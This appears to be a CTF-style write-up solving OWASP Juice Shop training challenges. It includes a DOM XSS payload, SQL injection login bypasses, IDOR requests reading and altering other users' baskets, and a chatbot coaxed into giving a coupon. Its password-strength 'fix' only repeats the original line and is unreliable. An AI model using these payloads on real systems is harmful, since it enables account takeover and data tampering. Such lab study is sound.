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Owasp Juice Shop

Getting started

OWASP Juice Shop is probably the most modern and sophisticated insecure web application! It can be used in security trainings, awareness demos, CTFs and as a guinea pig for security tools! Juice Shop encompasses vulnerabilities from the entire OWASP Top Ten along with many other security flaws found in real-world applications!

You can solve it here.

★ Finding Score board

  • When you start the challange you will get alerts from the site telling you that you need to find the score board to start. You can consider it as the first challange, so let’s go.

When we look at the source code carefully we will find JS files but main.js seems to be more interesting.
I opened it and sent it to JS Beautifier to make it more organized.
I searched using the keyword score and found this.

The endpoint is /score-board congratzzzzz

The coding challange

You will see that the score-board endpoint is disclosed in the line number 114
We can’t remove it because it will break the functionality of the site


  • Perform a DOM XSS attack with <iframe src="javascript:alert(`xss`)">.
    After examining the site you will find an input to search functionality.
    I tried to put things like <h1> and it’s rendered successfully so let’s try our payload.


The coding challange

	filterTable () {
	    let queryParam: string = this.route.snapshot.queryParams.q
	    if (queryParam) {
	      queryParam = queryParam.trim()
	      this.dataSource.filter = queryParam.toLowerCase()
	      this.searchValue = this.sanitizer.bypassSecurityTrustHtml(queryParam)
	      this.gridDataSource.subscribe((result: any) => {
	        if (result.length === 0) {
	          this.emptyState = true
	        } else {
	          this.emptyState = false
	    } else {
	      this.dataSource.filter = ''
	      this.searchValue = undefined
	      this.emptyState = false

The problem is in this line this.searchValue = this.sanitizer.bypassSecurityTrustHtml(queryParam)
Fixing: make it this.searchValue = queryParam because when you use bypassSecurityTrustHtml you must ensure that the HTML content does not come from untrusted sources or user inputs without proper sanitization.

★ Bully Chatbot

  • Receive a coupon code from the support chatbot.
    Consider this challange as a break xD.
    attacking the chat bot maybe done by many ideas but in this the easiest one is the solution.
    You just need to repeat the question and Congratzzzz XD.

★ Error Handling

  • Provoke an error that is neither very gracefully nor consistently handled.

During site traversing I noticed there’s and api request to /rest/user/whoami and it returns data about the user like this

so i think it executes the whoami command so let’s try something like ls /rest/user/ls it gives status code 500 and the response is

  "error": {
    "message": "Unexpected path: /rest/user/ls",
    "stack": "Error: Unexpected path: /rest/user/ls\n    at E:\\careeeeeeeer\\Career\\for CTFs\\Web pentesting\\Orange Juice node 20\\juice-shop_16.0.1\\build\\routes\\angular.js:38:18\n    at Layer.handle [as handle_request] (E:\\careeeeeeeer\\Career\\for CTFs\\Web pentesting\\Orange Juice node 20\\juice-shop_16.0.1\\node_modules\\express\\lib\\router\\layer.js:95:5)\n    at trim_prefix (E:\\careeeeeeeer\\Career\\for CTFs\\Web pentesting\\Orange Juice node 20\\juice-shop_16.0.1\\node_modules\\express\\lib\\router\\index.js:328:13)\n    at E:\\careeeeeeeer\\Career\\for CTFs\\Web pentesting\\Orange Juice node 20\\juice-shop_16.0.1\\node_modules\\express\\lib\\router\\index.js:286:9\n    at Function.process_params (E:\\careeeeeeeer\\Career\\for CTFs\\Web pentesting\\Orange Juice node 20\\juice-shop_16.0.1\\node_modules\\express\\lib\\router\\index.js:346:12)\n    at next (E:\\careeeeeeeer\\Career\\for CTFs\\Web pentesting\\Orange Juice node 20\\juice-shop_16.0.1\\node_modules\\express\\lib\\router\\index.js:280:10)\n    at E:\\careeeeeeeer\\Career\\for CTFs\\Web pentesting\\Orange Juice node 20\\juice-shop_16.0.1\\build\\routes\\verify.js:168:5\n    at Layer.handle [as handle_request] (E:\\careeeeeeeer\\Career\\for CTFs\\Web pentesting\\Orange Juice node 20\\juice-shop_16.0.1\\node_modules\\express\\lib\\router\\layer.js:95:5)\n    at trim_prefix (E:\\careeeeeeeer\\Career\\for CTFs\\Web pentesting\\Orange Juice node 20\\juice-shop_16.0.1\\node_modules\\express\\lib\\router\\index.js:328:13)\n    at E:\\careeeeeeeer\\Career\\for CTFs\\Web pentesting\\Orange Juice node 20\\juice-shop_16.0.1\\node_modules\\express\\lib\\router\\index.js:286:9\n    at Function.process_params (E:\\careeeeeeeer\\Career\\for CTFs\\Web pentesting\\Orange Juice node 20\\juice-shop_16.0.1\\node_modules\\express\\lib\\router\\index.js:346:12)\n    at next (E:\\careeeeeeeer\\Career\\for CTFs\\Web pentesting\\Orange Juice node 20\\juice-shop_16.0.1\\node_modules\\express\\lib\\router\\index.js:280:10)\n    at E:\\careeeeeeeer\\Career\\for CTFs\\Web pentesting\\Orange Juice node 20\\juice-shop_16.0.1\\build\\routes\\verify.js:105:5\n    at Layer.handle [as handle_request] (E:\\careeeeeeeer\\Career\\for CTFs\\Web pentesting\\Orange Juice node 20\\juice-shop_16.0.1\\node_modules\\express\\lib\\router\\layer.js:95:5)\n    at trim_prefix (E:\\careeeeeeeer\\Career\\for CTFs\\Web pentesting\\Orange Juice node 20\\juice-shop_16.0.1\\node_modules\\express\\lib\\router\\index.js:328:13)\n    at E:\\careeeeeeeer\\Career\\for CTFs\\Web pentesting\\Orange Juice node 20\\juice-shop_16.0.1\\node_modules\\express\\lib\\router\\index.js:286:9\n    at Function.process_params (E:\\careeeeeeeer\\Career\\for CTFs\\Web pentesting\\Orange Juice node 20\\juice-shop_16.0.1\\node_modules\\express\\lib\\router\\index.js:346:12)\n    at next (E:\\careeeeeeeer\\Career\\for CTFs\\Web pentesting\\Orange Juice node 20\\juice-shop_16.0.1\\node_modules\\express\\lib\\router\\index.js:280:10)\n    at logger (E:\\careeeeeeeer\\Career\\for CTFs\\Web pentesting\\Orange Juice node 20\\juice-shop_16.0.1\\node_modules\\morgan\\index.js:144:5)\n    at Layer.handle [as handle_request] (E:\\careeeeeeeer\\Career\\for CTFs\\Web pentesting\\Orange Juice node 20\\juice-shop_16.0.1\\node_modules\\express\\lib\\router\\layer.js:95:5)\n    at trim_prefix (E:\\careeeeeeeer\\Career\\for CTFs\\Web pentesting\\Orange Juice node 20\\juice-shop_16.0.1\\node_modules\\express\\lib\\router\\index.js:328:13)\n    at E:\\careeeeeeeer\\Career\\for CTFs\\Web pentesting\\Orange Juice node 20\\juice-shop_16.0.1\\node_modules\\express\\lib\\router\\index.js:286:9"

I think there are many other ways to solve this challange
congratzzzz anyway xD

★★ Login Admin

  • Log in with the administrator’s user account.

It’s a very simple sqli as when i login using 'or 1=1 --:anypasswd i login as admin.
Notice that we got admin account by luck as there maybe many users in the database why we got the admin then?? This because the admin was the first user in the table xDDDD.

★★ Password Strength

  • Log in with the administrator’s user credentials without previously changing them or applying SQL Injection.

The admin’s login data


The payload of the JWT

  "status": "success",
  "data": {
    "id": 1,
    "username": "",
    "email": "admin@juice-sh.op",
    "password": "0192023a7bbd73250516f069df18b500",
    "role": "admin",
    "deluxeToken": "",
    "lastLoginIp": "",
    "profileImage": "assets/public/images/uploads/defaultAdmin.png",
    "totpSecret": "",
    "isActive": true,
    "createdAt": "2024-06-19 13:25:14.112 +00:00",
    "updatedAt": "2024-06-19 13:25:14.112 +00:00",
    "deletedAt": null
  "iat": 1718803938

so The admin’s email : admin@juice-sh.op
The password hash (MD5) : 0192023a7bbd73250516f069df18b500
The password after cracking : admin123

so we can login as admin using these creds


The coding challange

The code

            password: {
                type: DataTypes.STRING,
                set (clearTextPassword) {
                this.setDataValue('password', security.hash(clearTextPassword))

The problem is applying the hash directly without any validation of the strength of the password
Fixing is done be adding:

    set (clearTextPassword) {
		this.setDataValue('password', security.hash(clearTextPassword))

before this.setDataValue('password', security.hash(clearTextPassword))
Reason : According to NIST-800-63B, passwords (Memorized Secrets) should have at least eight characters to prevent ‘online attacks’. Furthermore, NIST-800-63B requires that passwords don’t appear in common dictionaries.


★★ view basket

  • View another user’s shopping basket.

When i visit my basket i note that there’s an API request to /rest/basket/6
When i change it to /rest/basket/1 i see the basket of the user whose id = 1 (no validation exists)

★★ Five-Star Feedback

  • Get rid of all 5-star customer feedback.

When i view feedbacks i can visit this api GET /api/Feedbacks/
Make the request to be OPTIONS then you find that you can use DELETE method

DELETE /api/Feedbacks/
will give error that the path is invalid so i added the id in the request like this DELETE /api/Feedbacks/1
1 is the id of the feedback i want to delete and i made this request for the feedbacks of 5 Stars

Note: i don’t know if there’s a way to delete based on the rating not the id

★★★ Login Jim & Login Bender

I managed to login to any account in the site like i did to the admin with small modification
{"email":"' or 1=1 LIMIT 1,1 --","password":""}
LIMIT 1,1 The first 1 is an index and the second 1 is number of rows retrieved
so i can change the first 1 to any number and i can login to any account
Jim was 1 and Bender was 2


★★★ Manipulate Basket

  • Put an additional product into another user’s shopping basket.

we said we can view any basket through GET /rest/basket/1
and when we add element to basket the req is to POST /api/BasketItems/
and the data is


when i try to change the basket id i get 401 unauthorized status code and {'error' : 'Invalid BasketId'}

so i made the req method to be OPTIONS and i found PUT method
when i try PUT /api/BasketItems/ i get error

  "error": {
    "message": "Unexpected path: /api/BasketItems/",
    "stack": "Error: Unexpected path: /api/BasketItems/\n    at E:\\careeeeeeeer\\Career\\for CTFs\\Web pentesting\\Orange Juice node 20\\juice-shop_16.0.1\\build\\routes\\angular.js:38:18\n    at Layer.handle [as handle_request] (E:\\careeeeeeeer\\Career\\for CTFs\\Web pentesting\\Orange Juice node 20\\juice-shop_16.0.1\\node_modules\\express\\lib\\router\\layer.js:95:5)\n    at trim_prefix (E:\\careeeeeeeer\\Career\\for CTFs\\Web pentesting\\Orange Juice node 20\\juice-shop_16.0.1\\node_modules\\express\\lib\\router\\index.js:328:13)\n    at E:\\careeeeeeeer\\Career\\for CTFs\\Web pentesting\\Orange Juice node 20\\juice-shop_16.0.1\\node_modules\\express\\lib\\router\\index.js:286:9\n    at Function.process_params (E:\\careeeeeeeer\\Career\\for CTFs\\Web pentesting\\Orange Juice node 20\\juice-shop_16.0.1\\node_modules\\express\\lib\\router\\index.js:346:12)\n    at next (E:\\careeeeeeeer\\Career\\for CTFs\\Web pentesting\\Orange Juice node 20\\juice-shop_16.0.1\\node_modules\\express\\lib\\router\\index.js:280:10)\n    at E:\\careeeeeeeer\\Career\\for CTFs\\Web pentesting\\Orange Juice node 20\\juice-shop_16.0.1\\build\\routes\\verify.js:168:5\n    at Layer.handle [as handle_request] (E:\\careeeeeeeer\\Career\\for CTFs\\Web pentesting\\Orange Juice node 20\\juice-shop_16.0.1\\node_modules\\express\\lib\\router\\layer.js:95:5)\n    at trim_prefix (E:\\careeeeeeeer\\Career\\for CTFs\\Web pentesting\\Orange Juice node 20\\juice-shop_16.0.1\\node_modules\\express\\lib\\router\\index.js:328:13)\n    at E:\\careeeeeeeer\\Career\\for CTFs\\Web pentesting\\Orange Juice node 20\\juice-shop_16.0.1\\node_modules\\express\\lib\\router\\index.js:286:9\n    at Function.process_params (E:\\careeeeeeeer\\Career\\for CTFs\\Web pentesting\\Orange Juice node 20\\juice-shop_16.0.1\\node_modules\\express\\lib\\router\\index.js:346:12)\n    at next (E:\\careeeeeeeer\\Career\\for CTFs\\Web pentesting\\Orange Juice node 20\\juice-shop_16.0.1\\node_modules\\express\\lib\\router\\index.js:280:10)\n    at E:\\careeeeeeeer\\Career\\for CTFs\\Web pentesting\\Orange Juice node 20\\juice-shop_16.0.1\\node_modules\\express-jwt\\lib\\index.js:44:7\n    at module.exports.verify (E:\\careeeeeeeer\\Career\\for CTFs\\Web pentesting\\Orange Juice node 20\\juice-shop_16.0.1\\node_modules\\express-jwt\\node_modules\\jsonwebtoken\\index.js:59:3)\n    at E:\\careeeeeeeer\\Career\\for CTFs\\Web pentesting\\Orange Juice node 20\\juice-shop_16.0.1\\node_modules\\express-jwt\\lib\\index.js:40:9\n    at Layer.handle [as handle_request] (E:\\careeeeeeeer\\Career\\for CTFs\\Web pentesting\\Orange Juice node 20\\juice-shop_16.0.1\\node_modules\\express\\lib\\router\\layer.js:95:5)\n    at trim_prefix (E:\\careeeeeeeer\\Career\\for CTFs\\Web pentesting\\Orange Juice node 20\\juice-shop_16.0.1\\node_modules\\express\\lib\\router\\index.js:328:13)\n    at E:\\careeeeeeeer\\Career\\for CTFs\\Web pentesting\\Orange Juice node 20\\juice-shop_16.0.1\\node_modules\\express\\lib\\router\\index.js:286:9\n    at Function.process_params (E:\\careeeeeeeer\\Career\\for CTFs\\Web pentesting\\Orange Juice node 20\\juice-shop_16.0.1\\node_modules\\express\\lib\\router\\index.js:346:12)\n    at next (E:\\careeeeeeeer\\Career\\for CTFs\\Web pentesting\\Orange Juice node 20\\juice-shop_16.0.1\\node_modules\\express\\lib\\router\\index.js:280:10)\n    at E:\\careeeeeeeer\\Career\\for CTFs\\Web pentesting\\Orange Juice node 20\\juice-shop_16.0.1\\build\\routes\\verify.js:105:5\n    at Layer.handle [as handle_request] (E:\\careeeeeeeer\\Career\\for CTFs\\Web pentesting\\Orange Juice node 20\\juice-shop_16.0.1\\node_modules\\express\\lib\\router\\layer.js:95:5)"

the path is wrong so it may need the id at the end of the url

so i made it PUT /api/BasketItems/2 with the json data
and i got 400 status code bad request and this

{"message":"null: `BasketId` cannot be updated due `noUpdate` constraint","errors":[{"field":"BasketId","message":"`BasketId` cannot be updated due `noUpdate` constraint"}]}

so i removed the BasketId from the json and got the same error for ProductId so i removed it also
then i got this response


and when you view the BasketId:1 using GET /rest/basket/1 you will notice that the item is added.
